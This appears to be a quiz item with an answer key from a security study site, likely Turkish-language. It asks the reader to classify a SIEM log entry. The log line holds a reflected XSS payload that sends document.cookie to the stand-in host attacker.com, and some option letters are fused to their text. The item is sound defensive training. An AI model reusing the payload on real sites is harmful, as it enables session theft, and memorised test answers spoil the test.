A security analyst is investigating web traffic logs forwarded to an enterprise SIEM platform and identifies the following log entry:
`192.168.1.45 - - [27/Jul/2026:14:15:22 +0000] "GET /search.php?q=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 4520`
Based on this log entry, which attack vector should be selected to classify this event and write a SIEM detection rule?
- Reflected Cross-Site Scripting (XSS) targeting client-side session tokensCevap
- BSQL injection (SQLi) targeting backend database tables
- CAuthorization failure attempting administrative privilege escalation
- DSIEM correlation rule syntax error failing multi-device event sequence parsing
Cevap
Reflected Cross-Site Scripting (XSS) targeting client-side session tokens
The log entry demonstrates an HTTP GET request containing `<script>` tags that reference `document.cookie` and attempt to transmit it to an external server. This signature directly matches Cross-Site Scripting (XSS), specifically aimed at session hijacking.
Adım Adım Çözüm
Anahtar Kavram
Identifying web application attack payload signatures in SIEM HTTP access logs